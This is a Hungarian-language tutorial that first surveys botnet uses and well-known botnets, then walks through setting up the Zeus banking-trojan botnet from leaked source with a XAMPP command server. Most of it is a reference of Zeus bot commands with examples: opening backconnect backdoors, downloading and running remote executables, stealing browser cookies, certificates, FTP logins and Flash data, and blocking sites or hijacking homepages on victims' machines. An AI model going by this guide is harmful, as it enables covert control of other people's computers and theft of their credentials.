Ddos(distributed denial of service (attack)):
Túlterheléses támadást lehet indítani a segítségével. Az Anonymous hacker csoport előszeretettel alkalmazza ezt a fajta támadási formát. A lényege hogy annyi lekérdezés érkezik az oldalra hogy a szerver nem tudja kezelni az újabb lekérdezéseket, ezáltal az oldal megbénul.
Spam:
A botnet hálózatoknak nyilván ez a legnagyobb felhasználási területe. Ezzel a módszerrel terjesztik magukat is, phising emaileket küldenek stb.
Hálózat figyelése:
Képesek szűrni a hálózati forgalmat, és elkapni bejelentkezési adatokat.
Pay-per-click rendszerek:
Arra is használják őket hogy az ilyen linkekre kattintsanak, ezáltal is pénzhez jutnak.
Híres botnetek:
-BredoLab 30,000,000 zombi
-Mariposa 12,000,000 zombi
-Conficker 10,500,000+ zombi
-Zeus 3,600,00 zombi(csak az USA-ban)
Na de a puding próbája az evés. Nézzük meg hogy hogyan tudunk létrehozni egy ilyen botnetet. A Zeus botnetet fogjuk használni. Letölthető innen: https://github.com/Visgean/Zeus
Annyit még itt az elején leszögeznék hogy éles helyzetben nincs értelme ilyet használni, mert az adatokat még legalább 3-helyre fogja küldeni(nemhiába lehet csak így simán letölteni)... Szóval ez csak egy kis ízelítő lenne hogy hogy is működnek ezek a botnetek.
Először is a webszervert kell felállítani ahova a kliensek fognak csatlakozni. Én ehhez XAMPP-ot fogok használni. (Ez egy olyan webszerver ami tartalmazza a legfrissebb Apache, MySQL, PHP, és phpMyAdmin fájlokat) Letölthető innen: http://www.apachefriends.org/en/xampp.html
Csináltam egy videót amiben lépésről-lépésre vesszük a beállításokat: :)
os_shutdown - Kikapcsolja a gépet.
os_reboot - Újraindítja a gépet.
bot_uninstall - Letörli a bot-ot a gépről.
bot_update [url] - Frissíti a bot-nak a config fájlát. Meg kell neki adni paraméterként a config fájl helyét. Pl.: bot_update http://domain/update.bin
bot_bc_add [service] [backconnect_server] [backconnect_server_port] - Hozzáad egy hátsókaput ahova vissza tud mindig csatlakozni a kliens.
Paraméterek:
service - Port szám, vagy egy service név ahova a kapcsolatot csinálja.
backconnect_server - A szerver címe.
backconnect_server_port - A szerveren a port ahova csatlakozzon.
Pl.:
Socks-server : bot_bc_add socks 192.168.100.1 4500
RDP: bot_bc_add 3389 192.168.100.1 4500
VNC: bot_bc_add vnc 192.168.100.1 4500
bot_bc_remove [service] [backconnect_server] [backconnect_server_port] - Eltávolítja a hátsókapu-t(kat). Pl.: bot_bc_remove socks * * - Eltávolít minden sock szervíz kapcsolatot.
bot_bc_remove * * * - Minden kapcsolatot töröl.
user_logoff - Kijelentkezteti a felhasználót.
user_execute [elérési út] [parametéterek] - Ezzel a felhasználó nevében lehet parancsokat futtatni.
elérési út: Ez lehet egy URL vagy egy helyi elérési út.
Ha URL adunk meg az "%TEMP%\random_nev\file_nev" ide töltődik le. (Ha az URL utolsó része /-végződik akkor lehet hogy hibát fog dobni, ugyanis az URL végéből csinálja meg a mappa nevét meg a fájl nevét.)
paraméterek:
A fájlokatnak amiket futtatni tudunk meg tudunk adni paramétereket.
pl.:
user_execute http://www.hacking.com/dave/killer.exe /KILLALL /RESTART
user_cookies_get - Ellopja a sütiket az összes ismert böngészőből.
user_cookies_remove - Eltávolítja a sütiket az összes ismert böngészőből.
user_certs_get - Megszerzi a felhasználó által tárolt összes bizonyítványt("MY"). A szerverre tölti fel őket pfx filokként a "pass" jelszóval.
user_certs_remove - Kitöröli a "MY"-ban tárolt bizonyítványokat.
Cleaning certificate store "MY" of the current user.
user_url_block [url_1] [url_2] ... [url_X] - Blokkolja a hozzáférést a megadott URL-hez. :)
Amikor az áldozat megpróbálja megnyitni a blokkolt oldalt akkor a bot ezeket a hibaüzeneteket mutatja:
wininet.dll - ERROR_HTTP_INVALID_SERVER_RESPONSE
nspr4.dll - PR_CONNECT_REFUSED_ERROR
Paraméterek:
url_1, ulr_2, ...
Azok az URL-ek amit blokkolni akarunk.
Példák:
user_url_block http://www.google.com/*- Minden hozzáférést blokkol a http://www.google.com/ URL-hez.
user_url_block *- Minden hozzáférést blokkol amihez a felhasználó hozzá akar férni. Tehát elmegy a net. :D
user_url_block http://*.hu/*.html https://*.hu/*
Minden html oldalt blokkol a .hu zónán belül, plusz a https kapcsolatokat is a zónán belül.
user_url_unblock [url_1] [url_2] ... [url_X] - Engedélyezi a hozzáférést a megadott URL-hez.
Példák:
user_url_unblock *.google.*- Minden tiltást felold a tiltólistából amiben megtalálható ".google." string.
user_homepage_set [url] - (Erőszakkal) megváltoztatja a kezdőlapját az összes ismert böngészőnek.
user_homepage_set http://www.google.com/-Erőszakkal megváltoztatja a kezdőlapot a google.com-ra
user_homepage_set - Letiltja az automatikus kezdőlap megváltoztatást.
user_ftpclients_get - Kilistázza az összes FTP-bejelentkezést az összes FTP-kliensből.
user_flashplayer_get - Csinál egy archív "flashplayer.cab" a (*.sol) sütikből (%APPDATA%\Macromedia\Flash Player) és felrakja a szerverre.
user_flashplayer_remove - Eltávolítja az összes *.sol Adobe Flash Player sütit.(%APPDATA%\Macromedia\Flash Player)
